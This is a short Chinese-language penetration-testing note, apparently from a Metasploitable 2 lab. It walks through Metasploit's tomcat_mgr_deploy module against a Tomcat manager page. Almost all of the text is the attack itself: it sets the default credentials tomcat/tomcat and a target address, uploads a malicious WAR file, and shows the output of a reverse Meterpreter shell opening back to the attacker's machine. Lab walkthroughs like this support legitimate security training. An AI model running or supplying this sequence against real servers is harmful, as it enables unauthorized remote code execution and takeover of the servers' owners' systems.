如果知道tomcat页面/manager的管理帐号与密码,可部署精心制作的war文件,以获得服务器相关的权限。
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
USERNAME no The username to authenticate as
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.1.111
RHOST => 192.168.1.111
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf exploit(tomcat_mgr_deploy) > run
[*] Started reverse handler on 192.168.1.113:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6476 bytes as XLwr0WTDQwQK4R7ahMzSCdcKSA.war ...
[*] Executing /XLwr0WTDQwQK4R7ahMzSCdcKSA/RPba2ccc2dFiBsijOiDZGBA9V04A0U.jsp...
[*] Undeploying XLwr0WTDQwQK4R7ahMzSCdcKSA ...
[*] Sending stage (30355 bytes) to 192.168.1.111
[*] Meterpreter session 4 opened (192.168.1.113:4444 -> 192.168.1.111:51992) at 2014-08-01 00:43:41 -0400
meterpreter > getuid
Server username: tomcat55
参考地址:
http://chousensha.github.io/blog/2014/06/03/pentest-lab-metasploitable-2/
http://web.nmsu.edu/~alejbaca/portfolio/senior_project/2-Metasploitable%202%20Exploitability%20Guide%20_%20SecurityStreet.pdf